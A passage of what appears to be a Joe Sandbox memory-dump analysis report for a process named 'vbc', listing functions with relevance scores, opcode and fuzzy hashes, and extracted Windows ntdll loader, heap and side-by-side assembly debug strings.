                                                                • Opcode Fuzzy Hash: b86da9554cae1234bab7b145191ecf56f6040c9db9ce8bba0c0791504de2f37d
                                                                • Instruction Fuzzy Hash: 96F12831604246EFCB25EFA8C449BBABBF5FF09724F04859DE4829B741D770A94ACB50
                                                                Function 05680274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                • API String ID: 0-1700792311
                                                                • Opcode ID: f23400ac5cf20d6de8f6ca39c5c59e864331d79f1a19ce5a1ae8b51be12412c1
                                                                • Instruction ID: 9069aa15a54dd5480b44201857d398e63f564dde85938cdb1b717d5efb8731f9
                                                                • Opcode Fuzzy Hash: f23400ac5cf20d6de8f6ca39c5c59e864331d79f1a19ce5a1ae8b51be12412c1
                                                                • Instruction Fuzzy Hash: 4CD1F231604649DFCB11EFA8C419ABDBFF2FF49720F088A49E4469B751D7349989CB24
                                                                Function 055DADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                • API String ID: 0-664215390
                                                                • Opcode ID: a28b33522b285666f75a8c552a0814dff38ee665a1decd8dd35d6855d7b79df7
                                                                • Instruction ID: eff3148f7f16863a3de19dd4943e5a6ac0e235243fecb180a851640ba035c50a
                                                                • Opcode Fuzzy Hash: a28b33522b285666f75a8c552a0814dff38ee665a1decd8dd35d6855d7b79df7
                                                                • Instruction Fuzzy Hash: 7A32B072A042698BDF32CB58C888BAEF7B6BF45350F1545E9D849A7350DB319E81CF60
                                                                Function 05602F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 0564292E
                                                                • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 05642856
                                                                • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 05642881
                                                                • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 056429B1
                                                                • @, xrefs: 05603180
                                                                • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 056429AC
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 056428B2
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                • API String ID: 0-541586583
                                                                • Opcode ID: ce5e13442c4ddf16d830ca68de0eace5fa294ca5dfd8a93b075bc9070eaedc4e
                                                                • Instruction ID: d42d6830a17c978213d4b008d1366d5eeb8ac31eeee38fc1cb75df5c0f1ebae7
                                                                • Opcode Fuzzy Hash: ce5e13442c4ddf16d830ca68de0eace5fa294ca5dfd8a93b075bc9070eaedc4e
                                                                • Instruction Fuzzy Hash: BFC1BF75A002299ADB34DF19CC98BBAB3B5FF88711F1440E9E849A7390E7709E81CF55
                                                                Function 05654DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • ***Exception thrown within loader***, xrefs: 05654E27
                                                                • Execute '.cxr %p' to dump context, xrefs: 05654EB1
                                                                • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 05654DF5
                                                                • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 05654E38
                                                                • minkernel\ntdll\ldrutil.c, xrefs: 05654E06
                                                                • LdrpProtectedCopyMemory, xrefs: 05654DF4
                                                                • LdrpGenericExceptionFilter, xrefs: 05654DFC
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                • API String ID: 0-2973941816
                                                                • Opcode ID: 1ad5ef4bfbc8c02e994e166b4083432566dae0f17c94ae1ec16082d821c6202d
                                                                • Instruction ID: 7620967c71663244da47b8390e939b431448558568030d2d660e884c3f84b3fb
                                                                • Opcode Fuzzy Hash: 1ad5ef4bfbc8c02e994e166b4083432566dae0f17c94ae1ec16082d821c6202d
                                                                • Instruction Fuzzy Hash: A3216B722C41057BEB249A6CCC4ED767BADFB85A71F2405A4F812AAF40CDA0ED81C225
                                                                Function 056063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-792281065
                                                                • Opcode ID: 42e64a2f8b328490147476a95957cb79c458d0d026a6dd882d3a88002d5c1e97
                                                                • Instruction ID: 063f909ac178ddab5ff40b0e16e985a13dcca6ac5c85d79406e6b5e2d8c192d3
                                                                • Opcode Fuzzy Hash: 42e64a2f8b328490147476a95957cb79c458d0d026a6dd882d3a88002d5c1e97
                                                                • Instruction Fuzzy Hash: 6491F470B043159BDB29DF54D84ABBB7FA1FF44B25F145119E8026B780DFB0A841CBA9
                                                                Function 05602CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • @, xrefs: 05602E4D
                                                                • \WinSxS\, xrefs: 05602E23
                                                                • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 0564276F
                                                                • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 0564279C
                                                                • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 05642706
                                                                • .Local\, xrefs: 05602D91
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                • API String ID: 0-3926108909
                                                                • Opcode ID: c844388511bf0ba006c7df21734fbfbfa3584ad2684a2e98680c19f10fb28690
                                                                • Instruction ID: 711c74d7e2c7d10916c80f34120efdd45c1b87927a8abcc2ed164973abd20998
                                                                • Opcode Fuzzy Hash: c844388511bf0ba006c7df21734fbfbfa3584ad2684a2e98680c19f10fb28690
                                                                • Instruction Fuzzy Hash: 8B81DCB9608301DFDB16CF18C4A8A6BB7E9BF85700F14885DF885CB381D670D945CBA2
                                                                Function 055C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpInitShimEngine, xrefs: 056299F4, 05629A07, 05629A30
                                                                • apphelp.dll, xrefs: 055C6496
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05629A2A
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 05629A11, 05629A3A
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 056299ED
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05629A01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-204845295
                                                                • Opcode ID: 817f4feb3fb8f9f8d32507fc2d5e73b87fefc1b01ad95088fb936543728ae9b9
                                                                • Instruction ID: b804fe8a402b3bf9b3bf49b416f4897bc5d625c9188aff50887f0a418dc4f30a
                                                                • Opcode Fuzzy Hash: 817f4feb3fb8f9f8d32507fc2d5e73b87fefc1b01ad95088fb936543728ae9b9
                                                                • Instruction Fuzzy Hash: F151E1713187049FE324DF64D84ABAB7BE9FBC4744F40491DF4869B250DA70E944CBA2
                                                                Function 05602674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05642180
                                                                • SXS: %s() passed the empty activation context, xrefs: 05642165
                                                                • RtlGetAssemblyStorageRoot, xrefs: 05642160, 0564219A, 056421BA
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 056421BF
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05642178
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0564219F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                • API String ID: 0-861424205
                                                                • Opcode ID: 0fce218ce6164449b2e5f0f43824453d3a1ed807be9cf4479405f9f4afcee5f6
                                                                • Instruction ID: 804563d5ebdc61e986d565924c8adad9b27946e77e2b083b44dc640ad69427c7
                                                                • Opcode Fuzzy Hash: 0fce218ce6164449b2e5f0f43824453d3a1ed807be9cf4479405f9f4afcee5f6
                                                                • Instruction Fuzzy Hash: 1F31357AF4021077F721CA95CCA9FAF7779FF98A50F150059BA05B7280D6B0AE01CAA1
                                                                Function 0560C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Loading import redirection DLL: '%wZ', xrefs: 05648170
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 05648181, 056481F5
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 056481E5
                                                                • LdrpInitializeImportRedirection, xrefs: 05648177, 056481EB
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0560C6C3
                                                                • LdrpInitializeProcess, xrefs: 0560C6C4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-475462383
                                                                • Opcode ID: 78fe9f4f91357dd4ff1c50e1be788cb9e11784edd9c0fc22d30fa781c9de5b8f
                                                                • Instruction ID: fdd17dd08ce90d00b4fa015a3168eb44d0b975988aeaf631bdec75c80dde4990
                                                                • Opcode Fuzzy Hash: 78fe9f4f91357dd4ff1c50e1be788cb9e11784edd9c0fc22d30fa781c9de5b8f
                                                                • Instruction Fuzzy Hash: AC3102717587069BD324EB28DD4AE2BBB95FF84B10F05095CF9816B390DA60ED04CBA6
                                                                Function 0561096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 05612DF0: LdrInitializeThunk.NTDLL ref: 05612DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05610D74
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                • API String ID: 1404860816-0
                                                                • Opcode ID: c7bb041b69f675d47b6e1aa79a63982544e6630bc46fdec62009d6234e600c2e
                                                                • Instruction ID: cb9359d30c6ba5585925de98e9f12029922e731caf5632dcb882025d1ca22261
                                                                • Opcode Fuzzy Hash: c7bb041b69f675d47b6e1aa79a63982544e6630bc46fdec62009d6234e600c2e
                                                                • Instruction Fuzzy Hash: B5426C75A00715DFDB20CF28C884BAAB7F5BF44310F1885A9E989DB641DB70AA85CF64
                                                                Function 05654F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                • API String ID: 0-2518169356
                                                                • Opcode ID: d0e49b446ab2ac0b2432f26ca610d120e021d9b1841858775d5d9b27f0403013
                                                                • Instruction ID: 7e2b36a0d55faa06a9370c74fa15eb486315f4aa81abc336928653d031bae0fe
                                                                • Opcode Fuzzy Hash: d0e49b446ab2ac0b2432f26ca610d120e021d9b1841858775d5d9b27f0403013
                                                                • Instruction Fuzzy Hash: 1791BF72E006198BCB21CF68C884ABEBBB1FF98320F594169E812E7350E735D941CB94
                                                                Function 055DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                • API String ID: 0-379654539
                                                                • Opcode ID: 89aec3bd0384f2c820adb7de0957e821b904c150c0d891f92b580fbf2924acb2
                                                                • Instruction ID: bb4226259b2ed00c1967800549eb080e9b579481a737cb7b01cc3448ca7c2a0b
                                                                • Opcode Fuzzy Hash: 89aec3bd0384f2c820adb7de0957e821b904c150c0d891f92b580fbf2924acb2
                                                                • Instruction Fuzzy Hash: E9C18C76208382CFCB21CF58C044B6BB7E5BF84744F04496AF8968B751E774DA45CBA6
                                                                Function 05608402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • @, xrefs: 05608591
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0560855E
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 05608421
                                                                • LdrpInitializeProcess, xrefs: 05608422
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1918872054
                                                                • Opcode ID: 04a0da359cdb42e48ff421c34f001f6a3543d33d9f4e08e193a42294645a0645
                                                                • Instruction ID: 45b435fbe56ec823833315fbc8640c5e6b9a358c614af000dedc1334bedec888
                                                                • Opcode Fuzzy Hash: 04a0da359cdb42e48ff421c34f001f6a3543d33d9f4e08e193a42294645a0645
                                                                • Instruction Fuzzy Hash: 94919A72608745AFD722DE21CD55EBBBAE8BF88744F44092EFA8593190E730D904CB66
                                                                Function 055E0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 056355AE
                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 056354ED
                                                                • HEAP: , xrefs: 056354E0, 056355A1
                                                                • HEAP[%wZ]: , xrefs: 056354D1, 05635592
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                • API String ID: 0-1657114761
                                                                • Opcode ID: 2137cdc4dfc477ab4bdf5f3623f99a4357b8780ce447c6543716d300c7f7aec5
                                                                • Instruction ID: 385796477b1d8e61f8b3de797c60683b02f15b231db463d818fb51afd81c6831
                                                                • Opcode Fuzzy Hash: 2137cdc4dfc477ab4bdf5f3623f99a4357b8780ce447c6543716d300c7f7aec5
                                                                • Instruction Fuzzy Hash: A8A1EF3460420A9FDB28CF68C489BBAFBF2BF54310F148569D48A9B791D7B4F845CB90
                                                                Function 0560273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 056421D9, 056422B1
                                                                • SXS: %s() passed the empty activation context, xrefs: 056421DE
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 056422B6
                                                                • .Local, xrefs: 056028D8
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                • API String ID: 0-1239276146
                                                                • Opcode ID: dde5a11109d73c7ecb308451dd42eb8b289b5697c64f3c09ac8f99adf289eb6f
                                                                • Instruction ID: 41602b68edc74045c3954a9e7096793f8e8c673c9446161ffa1f77ad74323725
                                                                • Opcode Fuzzy Hash: dde5a11109d73c7ecb308451dd42eb8b289b5697c64f3c09ac8f99adf289eb6f
                                                                • Instruction Fuzzy Hash: 56A1A639A44219DBCF38CF55C898BAAB3B5BF58314F2501E9D809A7791D7309E81CF90
                                                                Function 055D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 056310AE
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05630FE5
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0563106B
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05631028
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                • API String ID: 0-1468400865
                                                                • Opcode ID: dcfecdaafc6864978396b86882a623978f6992c8263aabde509c6ba83605b8ba
                                                                • Instruction ID: e1a2149aaf242ca6fee4a0f234fd22ce59639e8dcfff5854395a7ab14ac82ffd
                                                                • Opcode Fuzzy Hash: dcfecdaafc6864978396b86882a623978f6992c8263aabde509c6ba83605b8ba
                                                                • Instruction Fuzzy Hash: 4C71AFB26043049FCB20DF58C889FA7BBA9BF457A4F44046CF8498B246D734D589CBE6
                                                                Function 05604D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0564362F
                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 05643640, 0564366C
                                                                • LdrpFindDllActivationContext, xrefs: 05643636, 05643662
                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 0564365C
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                • API String ID: 0-3779518884
                                                                • Opcode ID: d3f72c4ba031a492e6839cec8ea7970dec50f1e9aa280036e5f8932251d891e1
                                                                • Instruction ID: b43cf75f9c5ca15f73c64f612eb20a6e707c8056fc8396f75567bf270d1a9c66
                                                                • Opcode Fuzzy Hash: d3f72c4ba031a492e6839cec8ea7970dec50f1e9aa280036e5f8932251d891e1
                                                                • Instruction Fuzzy Hash: BE314B32A042119ADF39EB08C84DF7BB6A5FB01616F06642AE60557BD0EFA0DCC2C7D5
                                                                Function 055F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpDynamicShimModule, xrefs: 0563A998
                                                                • apphelp.dll, xrefs: 055F2462
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0563A9A2
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0563A992
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-176724104
                                                                • Opcode ID: 5387161a863a0b117802427640b46e878b7947c61c15c7fab68ae9f1ef3d0849
                                                                • Instruction ID: 57c7944719deb24e2c52ecade86a2b7d6ba7a70994b16a3c80977ed2760cca4f
                                                                • Opcode Fuzzy Hash: 5387161a863a0b117802427640b46e878b7947c61c15c7fab68ae9f1ef3d0849
                                                                • Instruction Fuzzy Hash: A2312572B20205ABDB20DF98D84BEBABFB6FB84704F164459F9416B340DBB0A841D790
                                                                Function 055E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-4253913091
                                                                • Opcode ID: 3a99f7427db20883b3907ed5d87d417d6f449c73f916942ee604117a7fd27893
                                                                • Instruction ID: c58120ee860eab3f963ad64733c1ec0ff1df7ed19904836d21a1283d9a423298
                                                                • Opcode Fuzzy Hash: 3a99f7427db20883b3907ed5d87d417d6f449c73f916942ee604117a7fd27893
                                                                • Instruction Fuzzy Hash: DCF19970B04605DFDB29CF68C899F7AB7B6FF44300F1486A8E4569B7A1D770A981CB90
                                                                Function 055CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                • API String ID: 0-2779062949
                                                                • Opcode ID: c3660db66c273a4d7d927d46a0427f7de71ed95ab19392e34ab68d666126d6e9
                                                                • Instruction ID: 81932d8605d6249bbc06b5ecae51b3c600f5b78d5596f295c6179f81d7bcabb1
                                                                • Opcode Fuzzy Hash: c3660db66c273a4d7d927d46a0427f7de71ed95ab19392e34ab68d666126d6e9
                                                                • Instruction Fuzzy Hash: 22A15975911A29ABDB31DF64CC88BAEB7B8FF48710F1001E9E909A7250E7359E84CF54
                                                                Function 055CCCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • @, xrefs: 055CCD63
                                                                • InstallLanguageFallback, xrefs: 055CCD7F
                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 055CCD34
                                                                Memory Dump Source
